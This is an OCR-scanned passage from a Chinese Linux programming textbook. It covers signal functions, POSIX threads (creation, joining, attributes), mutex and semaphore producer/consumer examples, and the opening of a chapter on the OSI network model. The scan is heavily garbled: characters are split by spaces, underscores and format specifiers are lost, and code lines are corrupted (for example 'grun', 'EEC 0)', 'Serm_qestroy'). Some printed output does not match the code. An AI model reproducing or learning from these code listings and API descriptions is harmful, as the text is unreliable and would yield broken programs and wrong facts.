的 所 有 进程 发 送信 号 sig， 即 “群发 ”的 意思 。raise() 函 数 在 当前 进程 中 自 举 一 个 信号 sig， 
即 向 当前 进程 发 送信 号 。 


各 注意 
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: killO 函 数 的 名 称 虽 然 是 “ 杀 死 ”的 意思 ， 但 是 它 并 不 是 杀 死 某 个 进程 ， 而 是 向 某 


个 进程 发 送信 号 ， 这 个 信号 除了 SIGSTOP 和 SIGKILL， 一 般 不 会 使 进程 显 式 地 
退出 。 
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4.4 Linux 下 的 线程 


线程 的 概念 早 在 20 世纪 60 年 代 就 被 提出 , 但 是 在 操作 系统 中 真正 使 用 多 线程 是 在 20 
世纪 80 年 代 的 中 期 。 在 使 用 线程 方面 ，Solaris 是 其 中 的 先驱 。 在 传统 的 UNIX 系统 中 ， 
线程 的 概念 也 被 使 用 ， 但 是 一 个 线程 对 应 着 一 个 进程 ， 因 此 多 线程 变 成 了 多 进程 ， 线 程 的 
真正 优点 没有 得 到 发 挥 。 现 在 ， 多 线程 的 技术 在 操作 系统 中 已 经 得 到 普及 ， 被 很 多 操作 系 
统 所 采用 ， 其 中 包括 Windows 操作 系统 和 Linux 系统 。 与 传统 的 进程 相 比 较 ， 用 线程 来 实 
6 功能 有 如 下 的 优点 : 

口 系统 资源 消耗 低 ; 
口 速度 快 ; 
口 线程 间 的 数据 共享 比 进程 间 容 易 得 多 。 


4.4.1 多 线程 编程 实例 


Linux 系统 下 的 多 线程 遵循 POSIX 标准 ， 叫 做 pthread， 读 者 可 以 使 用 man pthread 在 
Linux 系统 下 查看 系统 对 线程 的 解释 。 编 写 Linux 下 的 线程 需要 包含 头 文件 pthread.h， 在 
生成 可 执行 文件 的 时 候 需要 链接 库 libpthread.a 或 者 libpthread.so。 

下 面 首先 给 出 一 个 简单 的 多 线程 的 例子 ， 引 入 多 线程 的 概念 : 


LA 

02 * pthread.c 

03 * 线程 实例 

04 */ 

05 #include <stdio.h> 
06 #include <pthread.h> 
07 #include <unistd.h> 


08 static int run = 1; /* 运 行 状态 参数 */ 

09 static int retvalue ; /* 线 程 返回 值 */ 

10 void *start routine(void *arg) /* 线 程 处 理 函 数 */ 

re ee 

12 int *running = arg /* 获 取 运 行 状态 指针 */ 

13 printf(" 子 线程 初始 化 完毕 ， 传 入 参数 为 :sd\n", *running) ; /* 打 印信 息 */ 
14 while (*running) /* 当 running 控制 参数 有 效 */ 
15 { 

16 Printf (" 子 线程 正在 运行 \n") ; /* 打 印 运行 信息 */ 

7 usleep (1); /* 等 待 */ 

18 } 

19 Printf(" 子 线程 退出 \n") /* 打 印 退 出 信息 */ 

20 

2 retvalue = 8; /* 设 置 退出 值 */ 

22 pthread exit( (void*)&retvalue); /* 线 程 退 出 并 设置 退出 值 */ 
-2 

24 int main(void) 

0! 

26 pthread t pt; 

Es int ret = -1; 

28 int times = 3; 

29 int i = 0; 

30 int *ret join = NULL; 
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eol 

32 ret = pthread create(&pt, NULL, (void*)start routine, grun); 
/* 建 立 线 程 */ 

33 EEC 0) /* 建 立 线 程 失败 */ 

34 { 

35 printf ("建立 线程 失败 \n") ; /* 打 印信 息 */ 

36 return 1; /* 返 回 */ 

EE } 

38 usleep(1) /* 等 待 */ 

39 for(;i<times;i++) /* 进 行 3 次 打印 */ 

40 { 

41 printf ("主线 程 打 印 \n")， /* 打 印信 息 */ 

42 usleep (1); /* 等 待 */ 

43 } 

44 run = 0; /* 设 置 线程 退出 控制 值 , 让 线程 退出 */ 

45 pthread join(pt, (void*) gret join); /* 等 待 线程 退出 */ 

46 printf ("线程 返回 值 为 :sd\n",*ret_join); ”/* 打 印 线程 的 退出 值 */ 

47 return 0; 

48 } 


上 面 的 代码 在 一 个 进程 中 调用 函数 pthread_create() 建 立 一 个 子 线程 。 主 线程 在 建立 子 
线程 之 后 打印 “主线 程 打 印 ” 子 线程 建立 成 功 之 后 打印 “ 子 程序 正在 运行 ”。 当 标志 参数 
running 不 为 0 的 时 候 ， 子 线程 会 一 直 打 印 上 述 的 消息 。 

主线 程 在 打印 上 述 的 “主线 程 打印 ”3 次 之 后 ， 设 置 标志 参数 的 值 为 0， 然 后 调用 
pthread_ join0) 函 数 等 待 线程 退出 。 子 线程 处 理 函 数 start_routine() 在 running 为 0 之 后 设置 退出 
值 为 8， 调 用 函数 pthread_exit() 退 出 ， 然 后 主线 程 的 pthread join(0) 函 数 会 返回 ， 程 序 结束 。 

将 上 述 代码 保存 到 文件 pthread.c 中 使 用 如 下 命令 进行 编译 后 ， 生 成 可 执行 文件 
pthread， 在 编译 的 时 候 链 接线 程 库 libpthread。 


gcc -o pthread Pthread.c -lpthread 


运行 pthread， 可 以 发 现 ， 当 子 线 程 初始 化 成 功 后 和 主线 程 交替 执行 : 


$ ./pthread 
子 线程 初始 化 完毕 , 传 入 参数 为 :1 
子 线程 正在 运行 
主线 程 打印 

子 线程 正在 运行 
子 线 程 正在 运行 
主线 程 打印 

子 线程 正在 运行 
子 线程 正在 运行 
主线 程 打 印 

子 线程 正在 运行 
子 线程 退出 
线程 返回 值 为 :8 


再 次 运行 此 程序 ， 得 到 如 下 结果 : 


$ ./pthread 

子 线程 初始 化 完毕 , 传 入 参数 为 :1 
子 线程 正在 运行 

主线 程 打 印 
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子 线程 正在 运行 
主线 程 打印 
子 线程 正在 运行 
子 线程 正在 运行 
主线 程 打印 
子 线程 正在 运行 
子 线程 退出 
线程 返回 值 为 :8 


前 后 两 次 结果 不 一 致 ， 主 要 是 两 个 线程 争夺 CPU 资源 造成 的 。 
4.4.2 Linux 下 线程 创建 函数 pthread_create() 


在 4.4.1 节 的 例子 中 , 用 到 了 两 个 线程 相关 的 函数 pthread_create() 和 pthread_ join()。 函 
数 pthread_create() 用 于 创建 一 个 线程 ， 函 数 pthread_join() 等 待 一 个 线程 的 退出 。 
在 pthread_create() 函 数 调 用 时 ， 传 入 的 参数 有 线程 属性 、 线 程 函 数 、 线 程 函 数 变 量 ， 
用 于 生成 一 个 某 种 特性 的 线程 ,线程 中 执行 线程 函数 。 创 建 线程 使 用 函数 pthread_create()， 
它 的 原型 为 : 
int pthread create(pthread t * thread, 
pthread attr 七 * attr; 
void * (*start routine) (void *), 
void * arg); 
口 thread: 用 于 标识 一 个 线程 , 它 是 一 个 pthread_t 类 型 的 变量 ,在 头 文件 pthreadtypes.h 
中 定义 ， 如 下 所 示 。 
typedef unsigned long int pthread t; 


口 attr: 这 个 参数 用 于 设置 线程 的 属性 ， 本 例 中 设置 为 空 ， 采 用 了 默认 属性 。 
口 start_routine: 当 线 程 的 资源 分 配 成 功 后 ， 线 程 中 所 运行 的 单元 ， 上 例 中 设置 为 自 
己 编写 的 一 个 函数 start_routine()。 

口 arg: 线程 函数 运行 时 传 入 的 参数 ， 上 例 将 一 个 run 的 参数 传 入 用 于 控制 线程 的 

结束 。 

当 创 建 线程 成 功 时 ， 函 数 返 回 0， 若 不 为 0， 则 说 明 创建 线程 失败 ， 常 见 的 错误 返回 
代码 为 EAGAIN 和 EINVAL。 错误 代码 EAGAIN 表示 系统 中 的 线程 数量 达到 了 上 限 , 错误 
代码 EINVAL 表示 线程 的 属性 非法 。 

线程 创建 成 功 后 ， 新 创建 的 线程 按照 参数 3 和 参数 4 确定 一 个 运行 函数 ， 原 来 的 线程 
在 线程 创建 函数 返回 后 继续 运行 下 一 行 代码 。 


4.4.3 ”线程 的 结束 函数 pthread_join() 和 pthread_exit() 
函数 pthread join0) 用 来 等 待 一 个 线程 运行 结束 。 这 个 函数 是 阻塞 函数 ， 一 直到 被 等 待 
的 线程 结束 为 止 ， 函 数 才 返 回 并 且 收 回 被 等 待 线程 的 资源 。 函 数 原型 为 
extern int Pthread join _P ((Pthread t _ th, void ##+_ thread return)) 
口 _th: 线程 的 标识 符 ， 即 pthread_create() 函 数 创建 成 功 的 值 。 
口 _ thread return: 线程 返回 值 , 它 是 一 个 指针 ,可 以 用 来 存储 被 等 待 线程 的 返回 值 。 
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如 上 例 中 的 ret join， 当 线程 返回 时 可 以 返回 一 个 指针 ，pthread join0 在 等 待 的 线 
程 返回 时 ， 获 得 此 值 。 这 个 参数 是 一 个 指向 指针 的 指针 类 型 参数 ， 在 调用 此 函数 
来 获得 线程 参数 传 出 的 时 候 需要 注意 ， 通 常用 一 个 指针 变量 的 地 址 来 表示 。 
上 面 的 代码 中 先 建立 一 个 int 类 型 的 指针 ，int *ret join = NULL， 然 后 调用 函数 
pthread join() 来 获得 线程 退出 时 的 传 出 值 pthread join(pb(void*)&cret join)。 
线程 函数 (在 上 例 中 为 函数 start_routine(0)) 的 结束 方式 有 两 种 ， 一 种 是 线程 函数 运行 
结束 ， 不 用 返回 结果 ;， 另 一 种 方式 是 通过 函数 pthread_exit() 来 实现 ， 将 结果 传 出 。 它 的 函 
数 原型 为 : 


extern void pthread exit _P ((void * retval)) _attribute  ((_ noreturn )); 


参数 _retval 是 函数 的 返回 值 , 这 个 值 可 以 被 pthread join() 函 数 捕获 , 通过 _thread_retrun 
参数 获得 此 值 ， 如 上 例 所 示 。 
4.4.4 线程 的 属性 

在 上 例 中 ， 用 pthread_create(0) 函 数 创 建 线程 时 ， 使 用 了 默认 参数 ， 即 将 该 函数 的 第 2 
个 参数 设 为 NULL。 通 常 来 说 ， 建 立 一 个 线程 的 时 候 ， 使 用 默认 属性 就 够 了 ， 但 是 很 多 时 
候 需 要 调整 线程 的 属性 ， 特 别 是 线程 的 优先 级 。 

1. 线程 的 属性 结构 

线程 的 属性 结构 为 pthread_attr t， 在 头 文件 <phtreadtypes.h> 中 定义 ， 代 码 如 下 : 


typedef struct _ pthread attr s 
{ 


oh _ detachstate; /* 线 程 的 终止 状态 */ 
int _schedpolicy; /* 调 度 优先 级 */ 
struct _ sched param _ schedparam; /* 参 数 */ 

int _ inheritsched; /* 继 承 */ 

rs _ scope; /+* 范 围 */ 

size 七 _ guardsize; /* 保 证 尺寸 */ 

int _ stackaddr set; /* 运 行 栈 */ 

void * stackaddr; /* 线 程 运行 栈 地 址 */ 
size 七 __ stacksize; /* 线 程 运行 栈 大 小 */ 


} pthread attr t; 

但 是 线程 的 属性 值 不 能 直接 设置 ， 须 使 用 相关 函数 进行 操作 。 线 程 属性 的 初始 化 函数 
为 pthread_attr_init()， 这 个 函数 必须 在 pthread_create() 函 数 之 前 调用 。 

属性 对 象 主要 包括 线程 的 摘 取 状 态 、 调 度 优先 级 、 运 行 栈 地 址 、 运 行 栈 大 小 、 优 先 级 。 

2. 线程 的 优先 级 

线程 的 优先 级 是 经 常设 置 的 属性 ， 由 两 个 函数 进行 控制 : pthread_attr_getschedparam() 
函数 获得 线程 的 优先 级 设置 ， 函 数 pthread_attr_setschedparam() 设 置 线程 的 优先 级 。 

int pthread attr setschedparam(pthread attr 七 *attr, const struct 


sched param *param); 
int pthread attr getschedparam(const pthread attr 七 *attr, struct 


a 


第 4 章 程序 、 进 程 和 线程 
sched param *param); 


线程 的 优先 级 存放 在 结构 sched_param 中 。 其 操作 方式 是 先 将 优先 级 取出 来 ， 然 后 对 


需要 设置 的 参数 修改 后 再 写 回去 ， 这 是 对 复杂 结构 进行 设置 的 通用 办 法 ， 防 止 因为 设置 不 


a 


当 造 成 不 可 预料 的 麻烦 。 例 如 设置 优先 级 的 代码 如 下 ， 因 为 结构 sched_param 在 头 文件 


sched.h 中 ， 所 以 要 加 入 头 文件 sched.h。 


#include <stdio.h> 
#include <pthread.h> 
#include <sched.h> 
pthread attr t attr; 
struct sched param sch; 
pthread t pt; 


pthread attr init(g&attr); /* 初 始 化 属性 设置 */ 
Pthread attr getschedparam(&attr, &sch); /* 获 得 当前 的 线程 属性 */ 
sch.sched priority = 256; /* 设 置 线程 优先 级 为 256*/ 
pthread attr setschedparam(&attr, &sch); /* 设 置 线程 优先 级 */ 
pthread create(&pt, &attr, (void*)start routine, &run); 

/* 建 立 线 程 , 属性 为 上 述 设置 */ 


3. 线程 的 绑 定 状态 
设置 线程 绑 定 状态 的 函数 为 pthread_attr_setscope()， 它 有 两 个 参数 ， 第 1 个 是 指向 属 


性 结构 的 指针 ， 第 2 个 是 绑 定 类 型 ， 它 有 两 个 取 值 : PTHREAD_SCOPE _ SYSTEM 〈 绑 定 
的 ) 和 PTHREAD_ SCOPE PROCESS 〈 非 绑 定 的 )。 下 面 的 代码 即 创建 了 一 个 绑 定 的 线程 。 


#include <pthread.h> 

pthread attr t attr; 

pthread t tid; 

/* 初 始 化 属性 值 , 均 设 为 默认 值 */ 

Pthread attr init(&attr) 

pthread attr setscope(&attr，PTHREAD SCOPE SYSTEM); /#* 设 置 绑 定 的 线程 */ 
Pthread_create (&tid，&attr， (void *) my_function, NULL); 


4. 线程 的 分 离 状 态 
线程 的 分 离 状 态 决 定 线程 的 终止 方法 。 线 程 的 分 离 状态 有 分 离线 程 和 非 分 离线 程 


两 种 。 


总 


xk 


st 


在 上 面 的 例子 中 ， 线 程 建 立 的 时 候 没有 设置 属性 ， 默 认 终 止 方法 为 非 分 离 状态 。 在 这 


情况 下 ， 需 要 等 待 创 建 线程 的 结束 。 只 有 当 pthread join() 函 数 返 回 时 ， 线 程 才 算 终止 ， 
F 且 释放 线程 创建 的 时 候 系统 分 配 的 资源 。 


分 离线 程 不 用 其 他 线程 等 待 ,当前 线程 运行 结束 后 线程 就 结束 了 , 并且 马上 释放 资源 。 

int pthread attr setdetachstate (pthread attr t *attr, int detachstate); 

参数 detachstate 可 以 为 分 离线 程 或 者 非 分 离线 程 ,， PTHREAD_CREATE_DETACHED 
于 设置 分 离线 程 ， PTHREAD_CREATE JOINABLE 用 于 设置 非 分 离线 程 。 

当 将 一 个 线程 设置 为 分 离线 程 时 ， 如 果 线 程 的 运行 非常 快 ， 可 能 在 pthread_create0 函 
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数 返 回 之 前 就 终止 了 。 由 于 一 个 线程 在 终止 以 后 可 以 将 线程 号 和 系统 资源 移交 给 其 他 的 线 
程 使 用 ， 此 时 再 使 用 函数 pthread_create() 获 得 的 线程 号 进行 操作 会 发 生 错误 。 


4.4.5 ”线程 间 的 互 斥 


互 斥 锁 是 用 来 保护 一 段 临 界 区 的 ， 它 可 以 保证 某 时 间 段 内 具有 一 个 线程 在 执行 一 段 代 
码 或 者 访问 某 个 资源 。 下 面 一 段 代码 是 一 个 生产 者 /消费 者 的 实例 程序 ， 生 产 者 生产 数据 ， 
消费 者 消耗 数据 ， 它 们 共用 一 个 变量 ， 每 次 只 有 一 个 线程 访问 此 公共 变量 。 


1. 线程 互 斥 的 函数 介绍 
与 线程 互 斥 有 关 的 函数 原型 和 初始 化 的 常量 如 下 ， 主 要 包含 互 斥 的 初始 化 方式 宏 定 
义 、 互 斥 的 初始 化 函数 pthread_ mnutex_init0)、 互 斥 的 锁定 函数 pthread_mutex_lock()、 互 斥 


的 预 锁定 函数 pthread_mutex_trylock0、 互 斥 的 解锁 函数 pthread mutex_unlock(O)、 互 斥 的 销 
毁 函 数 pthread_mutex_destroy()。 


#include <pthread.h> 

pthread mutex t fastmutex = PTHREAD MUTEX INITIALIZER; 

pthread mutex t recmutex = PTHREAD RECURSIVE MUTEX INITIALIZER NP; 
pthread mutex t errchkmutex = PTHREAD ERRORCHECK MUTEX INITIALIZER NP; 
int pthread mutex init(pthread mutex t *mutex, const pthread mutexattr 七 


*mutexattr); /* 互 斥 初 始 化 */ 
int pthread mutex lock(pthread mutex 七 *mutex) 7 /* 锁 定 互 斥 */ 
int pthread mutex trylock(pthread mutex 七 kmutex) /* 互 斥 预 锁定 */ 
int pthread mutex unlock(pthread mutex t *mutex); /* 解 锁 互 斥 */ 
int pthread mutex destroy (Pthread mutex t *mutex); /* 销 毁 互 斥 */ 


函数 pthread_mutex_init()， 初 始 化 一 个 mutex 变量 ， 结 构 pthread_mnutex_t 为 系统 内 部 
私有 的 数据 类 型 ,在 使 用 时 直接 用 pthread_mutex_t 就 可 以 了 ， 因 为 系统 可 能 对 其 实现 进行 
修改 。 在 上 例 中 属性 为 NULL， 表 明 使 用 默认 属性 。 

pthread_mnutex_lockO 函 数 声明 开始 用 互 斥 锁 上 锁 ， 此 后 的 代码 直至 调用 pthread_ 
mutex_unlock() 函 数 为 止 , 均 不 能 执行 被 保护 区 域 的 代码 ， 也 就 是 说 ,在 同一 时 间 内 只 能 有 
一 个 线程 执行 。 当 一 个 线程 执行 到 pthread_mutex_lock() 函 数 处 时 ， 如 果 该 锁 此 时 被 男 一 个 
线程 使 用 ， 此 线程 被 阻塞 ， 即 程序 将 等 待 另 一 个 线程 释放 此 互 斥 锁 。 

互 斥 锁 使 用 完毕 后 记得 要 释放 资源 ， 调 用 pthread_mutex_destroy() 函 数 进行 释放 。 


2. 线程 互 斥 函数 的 例子 


下 面 是 一 个 线程 互 斥 的 例子 。 代 码 用 线程 互 斥 的 方法 构建 了 一 个 生产 者 和 消费 者 的 例 
子 。 代 码 中 建立 了 两 个 线程 ， 函 数 producter ff) 用 于 生产 ， 函 数 consumer_fO 用 于 消费 。 


01 /* 

02 * mutex.c 

03 * 线程 实例 

04 */ 

05 #include <stdio.h> 

06 #include <pthread.h> 

07 #include <unistd.h> 

08 #include <sched.h> 

09 void *producter f (void *arg); /* 生 产 者 */ 
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10 void *consumer f (void *arg); /* 消 费 者 */ 

11 int buffer has item=0; /* 缓 冲 区 计数 值 */ 

12 pthread mutex t mutex; /* 互 斥 区 */ 

13 int running =1 ; /* 线 程 运行 控制 */ 

14 int main (void) 

LS 湛 

16 pthread t consumer t; /* 消 费 者 线程 参数 */ 

E7 pthread t producter t; /* 生 产 者 线程 参数 */ 

18 

19 Pthread mutex init (gmutex,NULL); /* 初 始 化 互 斥 */ 

20 

2 Pthread create (gproducter t, NULL, (void*)producter f, NULL ) ; 
/* 建 立 生产 者 线程 */ 

之 人 Pthread _ create (&consumer t, NULL, (void *) consumer f, NULL); 
/* 建 立 消 费 者 线程 */ 

23 usleep (1); /* 等 待 ,线程 创建 完毕 */ 

24 running =0; /* 设 置 线程 退出 值 */ 

25 pthread join(consumer t,NULL); /* 等 待 消费 者 线程 退出 */ 

26 pthread join(producter t,NULL); /* 等 待 生 产 者 线程 退出 */ 

El pthread mutex destroy (&mutex); /x* 销 毁 互 斥 x/ 

28 

29 return 0; 

EA 

31 void *producter f (void *arg) /* 生 产 者 线程 程序 */ 

EA 

33 while (running) /* 没 有 设置 退出 值 */ 

34 { 

35 pthread mutex lock (&mutex); /* 进 入 互 斥 区 */ 

36 buffer has_ item++; /* 增 加 计数 值 */ 

37 printf ("生产 ,总 数量 :$d\n",buffer_has_item); /* 打 印信 息 */ 

38 pthread mutex unlock (gmutex); /* 离 开 互 斥 区 */ 

329, } 

40 } 

41 void *consumer f(void *arg) /* 消 费 者 线程 程序 */ 

2 

43 while (running) /* 没 有 设置 退出 值 */ 

44 { 

45 pthread mutex lock(&mutex); /* 进 入 互 斥 区 */ 

46 buffer has item-—; /* 减 小 计数 值 */ 

47 printf ("消费 ,总 数量 :$d\n",buffer_ has _item); /* 打 印信 息 */ 

48 pthread mutex unlock (gmutex); /* 离 开 互 斥 区 */ 

49 

50 } 


上 例 中 声明 了 一 个 线程 互 斥 变量 mutex， 在 线程 函数 consumer_fO 和 函数 producter_f() 
中 , 用 线程 互 斥 锁 函 数 pthread_mutex_lock() 和 函数 pthread mutex_unlock() 来 保护 对 公共 变 
量 buffer_has item 的 访问 。 


4.4.6 ”线程 中 使 用 信和 号 量 


线程 的 信号 量 与 进程 的 信号 量 类 似 ， 但 是 使 用 线程 的 信号 量 可 以 高 效 地 完成 基于 线程 
的 资源 计数 。 信 号 量 实际 上 是 一 个 非 负 的 整数 计数 器 ， 用 来 实现 对 公共 资源 的 控制 。 在 公 
共 资 源 增加 的 时 候 ， 信 号 量 的 值 增加 : 公共 资源 消耗 的 时 候 ， 信 和 号 量 的 值 减少 ， 只 有 当 信 
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号 量 的 值 大 于 0 的 时 候 ， 才 能 访问 信号 量 所 代表 的 公共 资源 。 

信和 号 量 的 主要 函数 有 信号 量 初始 化 函数 sm_init)、 信 和 号 量 的 销毁 函数 sem_destroy()、 
信和 号 量 的 增加 函数 sem_post0、 信 号 量 的 减少 函数 sem_waitO 等 。 还 有 一 个 函数 sem_ 
trywait)， 它 的 含义 与 互 斥 的 函数 pthread_mutex_trylock() 是 一 致 的， 先 对 资源 是 否 可 用 进 
行 判 断 。 函 数 的 原型 在 头 文件 semaphore.h 中 定义 。 

1. 线程 信号 量 初始 化 函数 sem_init() 

sem_init() 函 数 用 来 初始 化 一 个 信号 量 。 它 的 原型 为 : 

extern int sem init P/((sem t* sem, int pshared, unsigned int value)); 

其 中 的 参数 sem 指向 信号 量 结构 的 一 个 指针 ， 当 信号 量 初始 化 成 功 的 时 候 ， 可 以 使 用 
这 个 指针 进行 信号 量 的 增加 减少 操作 ; 参数 pshared 用 于 表示 信和 号 量 的 共享 类 型 ， 不 为 0 
时 这 个 信号 量 可 以 在 进程 间 共享 ， 否则 这 个 信 号 量 只 能 在 当前 进程 的 多 个 线程 之 间 共 享 
参数 value 用 于 设置 信号 量 初始 化 的 时 候 信号 量 的 值 。 

2. 线程 信号 量 增加 函数 sem_post() 

sem_post() 函 数 的 作用 是 增加 信号 量 的 值 ， 每 次 增加 的 值 为 1。 当 有 线程 等 待 这 个 信号 
量 的 时 候 ， 等 待 的 线程 将 返回 。 函 数 的 原型 为 : 


#include <semaphore.h> 
int sem post(sem t *sem); 


3. 线程 信号 量 等 待 函数 sem_wait() 
sem_wait() 函 数 的 作用 是 减少 信号 量 的 值 ， 如 果 信 号 量 的 值 为 0， 则 线程 会 一 直 阻 塞 到 


信号 量 的 值 大 于 0 为止 。sem_wait() 函 数 每 次 使 信号 量 的 值 减少 1， 当 信号 量 的 值 为 0 时 不 
再 减少 。 函 数 原 型 为 : 


#include <semaphore.h> 
int sem wait(sem t *sem); 


4. 线程 信号 量 销 毁 函 数 sem_destroy() 
sem_destroy() 函 数 用 来 释放 信和 号 量 sem， 函 数 原型 为 : 


#include <semaphore.h> 
int sem destroy(sem t *sem); 


5. 线程 信号 量 的 例子 


下 面 来 看 一 个 使 用 信号 量 的 例子 。 在 mutex 的 例子 中 ， 使 用 了 一 个 全 局 变量 来 计数 ， 
在 这 个 例子 中 ， 使 用 信号 量 来 做 相同 的 工作 ， 其 中 一 个 线程 增加 信号 量 来 模仿 生产 者 ， 男 
一 个 线程 获得 信号 量 来 模仿 消费 者 。 


DE 
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03 * 线程 实例 

04 */ 

05 #include <stdio.h> 

06 #include <pthread.h> 
07 #include <unistd.h> 
08 #include <semaphore.h> 


09 void *producter f (void *arg); /* 生 产 者 线程 函数 */ 

10 void *consumer f (void *arg); /* 消 费 者 线程 函数 */ 

11 sem t sem; 

12 int running =1 ，; 

13 int main (void) 

14 { 

15 pthread t consumer t; /* 消 费 者 线程 参数 */ 

16 pthread t producter t; /* 生 产 者 线程 参数 */ 

下 沉 

18 sem init (&sem，0，16) 7 /* 信 号 量 初始 化 */ 

19 

20 pthread create(&producter t, NULL, (void*)producter f, NULL ); 
/* 建 立 生产 者 线程 */ 

2 pthread create(&consumer t, NULL, (void *)consumer f, NULL); 
/* 建 立 消费 者 线程 */ 

22 sleep (1); /* 等 待 */ 

23 running =0; /* 设 置 线程 退出 */ 

24 pthread join(consumer t,NULL); /* 等 待 消费 者 线程 退出 */ 

区 六 pthread join(producter t,NULL); /x* 等 待 生产 者 线程 退出 x/ 

26 Serm_qestroy(&sem) ; /* 销 毁 信 号 量 */ 

27 

28 return 0; 

29° 下 

30 void *producter f (void *arg) /* 生 产 者 处 理 程序 代码 */ 

3105 4 

32 int semval=0; /* 信 号 量 的 初始 值 为 0*/ 

33 while (running) /* 运 行 状态 为 可 运行 */ 

34 { 

35 usleep (1); /* 等 待 */ 

36 sem post (&sem); /* 信 号 量 增加 */ 

37 sem getvalue (&sem, &semval); /* 获 得 信号 量 的 值 */ 

38 printf ("生产 ,总 数量 :$d\n", semval) ; /* 打 印信 息 */ 

39 1 

40 } 

41 void *consumer f(void *arg) /* 消 费 者 处 理 程序 代码 */ 

42 { 

43 int semval=0; /* 信 号 量 的 初始 值 为 0*/ 

44 while (running) /* 运 行 状态 为 可 运行 */ 

45 { 

46 usleep (1); /* 等 待 */ 

47 sem wait(&sem); /* 等 待 信号 量 */ 

48 sem getvalue (&sem, &semval); /* 获 得 信号 量 的 值 */ 

49 printf ("消费 , 总 数量 :$d\n", semval) ; /* 打 印信 息 */ 

50 } 

3 


在 Linux 下 ， 用 命令 “gcc -lpthread sem.c -o sem” 生 成 可 执行 文件 sem。 运 行 sem， 得 
到 如 下 结果 : 


“3s 


第 1 篇 Linux 网 络 开发 基础 


生产 ,总 数量 :100 
生产 ,总 数量 :101 
生产 ,总 数量 :102 
消费 , 总 数量 :101 
生产 ,总 数量 :102 
消费 ,总 数量 :101 
消费 , 总 数量 :100 
生产 ,总 数量 :101 


从 执行 结果 中 可 以 看 出 ， 上 述 程序 建立 的 各 个 线程 间 存 在 竞争 关系 。 而 数值 并 未 按 产 
生 一 个 消耗 一 个 的 顺序 显示 出 来 ， 而 是 以 交叉 的 方式 进行 ， 有 的 时 候 产 生 多 个 后 再 消耗 多 
个 ， 造 成 这 种 现象 的 原因 是 信号 量 的 产生 和 消耗 线程 对 CPU 竞争 的 结果 。 


4.5 小 结 


本 章 介 绍 了 Linux 环境 下 进程 和 线程 的 概念 和 编程 方法 。 

进程 、 线 程 和 程序 概念 的 异同 主要 集中 于 进程 和 程序 之 间 的 动态 和 静态 、 进 程 和 线程 
之 间 的 运行 规模 的 大 小 之 分 。 进 程 的 产生 和 消亡 从 系统 的 层面 来 看 对 应 着 资源 的 申请 、 变 
量 的 设置 、 运 行 时 的 调度 ， 以 及 消亡 时 的 资源 释放 和 变量 重 置 。 

进程 间 的 通信 和 同步 的 方法 主要 有 管道 、 消 息 队 列 、 信 和 号 量 、 共 享 内 存 ， 以 及 信和 号 机 
制 。 这 些 机 制 都 是 UNIX 系统 IPC 的 典型 方法 。 

Linux 的 线程 是 一 个 轻 量 级 的 进程 ， 使 用 线程 来 编写 程序 比 进程 对 系统 的 负载 要 低 ， 
重要 的 是 共用 变量 和 资源 要 比 进程 的 方法 简单 得 多 。Linux 下 的 线程 并 不 是 现代 线程 的 典 
型 概念 ， 例 如 没有 POSIX 所 规定 的 挂 起 、 恢 复 运行 等 机 制 ， 它 是 在 Linux 进程 基础 上 的 一 
个 发 展 延伸 。 
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日 于 军事 用 途 出 现 的 , 现在 网 络 已 经 走 进 千家 万 户 , 成 为 生活 的 一 部 分 。 


联网 的 各 个 终端 之 间 能 否 进行 交互 的 软件 基础 是 网 络 协 议 栈 ， 目 前 主流 的 网 络 协议 栈 是 
TCP/IP 协议 栈 。 本 章 将 介绍 TCP/P 协议 栈 的 基本 知识 ， 主 要 包括 如 下 内 容 
ISO/OSI 的 网 络 模型 架构 ; 


口 


口 
口 
口 
口 
口 
口 


网 络 结构 的 标准 模型 是 OSI 模型 ， 


TCP/IP 网 络 模型 ; 


Internet 协议 ， 即 卫 协议; 
TCP/IP 模型 中 的 TCP 和 UDP 协议 及 ICMP 协议 ; 


地 址 解析 协议 ARP; 


IP 地 址 的 组 成 、 掩 码 及 建 网 时 如 何 进 行 子 网 划分 及 端口 的 含义 ; 


主机 字 节 序 和 网 络 字 节 


5.1 


序 。 


OSI 网 络 分 层 介 


绍 


它 是 由 国际 互联 网 标准 化 组 织 (International 


Organization for Standardization，ISO) 定义 的 网 络 分 层 模型 。 虽 然 目 前 没有 完全 按照 这 种 
模型 实现 的 网 络 协议 栈 ， 但 是 这 种 模型 对 于 理解 网 络 协议 内 部 的 架构 很 有 帮助 ， 为 学 习 网 
络 协议 提供 了 很 好 的 参考 模型 。 这 个 模型 一 般 称 为 ISO/OSI 开放 互联 模型 (ISO，Open 
System Interconnection Reference Model)， 在 实际 中 TCP/IP 协议 栈 应 用 更 为 广泛 。 


OSI 网 络 分 层 结 构 
ISO/OSI 开放 互联 模型 采用 7 层 结构 ， 如 图 5.1 所 示 。 


5.1.1 


主机 A 主机 B 
应 用 层 | 一 一 应 用 层 协 议 一 应 用 层 
表示 层 | 一 表示 层 协议 一 一 | 表示 层 
会 话 层 一 一 会 话 层 协议 一 一 | 会 话 层 
传输 层 | 一 一 传输 层 协 议 一 传输 层 
网 络 层 | 一 网 络 层 协议 一 一 | 网 络 层 

数据 链 路 层 | 数据 链 路 层 协议 -| 。 数据 链 路 层 


图 5.1 ISO/OSI 的 7 层 网 络 模型 
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在 OSI 的 7 层 模型 结构 中 ， 从 纵向 即 单个 主机 的 角度 来 看 ， 每 一 层 与 本 层 的 上 下 两 层 
从 逻辑 上 是 分 开 的 ， 如 A 的 网 络 层 和 数据 链 路 层 是 分 开 的 。 这 种 方式 使 得 每 一 层 为 上 一 层 
提供 服务 ， 依 赖 于 下 层 的 数据 并 为 上 一 层 提供 接口 。 同 时 各 层 之 间 的 规则 是 相互 独立 的 ， 
例如 数据 的 格式 、 通 信 的 方式 等 ， 这 称 为 本 层 的 协议 。 

不 同 主机 相同 层 之 间 是 对 等 的 , 例如 主机 A 中 的 应 用 层 和 主机 B 中 的 应 用 层 是 相同 的 
层次 , 这 两 个 层 互 为 对 等 层 , 对 等 层 之 间 的 规则 是 一 致 的 , 但 实现 不 一 定 相同 。 例如 , UNIX 
网 络 协议 栈 运行 在 主机 A 上 ,Windows 的 网 络 协议 栈 运行 在 主机 B 上 , 只 要 它们 的 规则 一 
致 就 可 以 。 例 如 A 上 的 FTP 服务 器 可 以 与 B 上 的 FTP 客户 端 实现 互相 通信 。 

一 个 主机 上 运行 的 网 络 规则 实现 的 集合 称 为 协议 栈 ， 主 机 利用 协议 栈 来 接收 和 发 送 数 
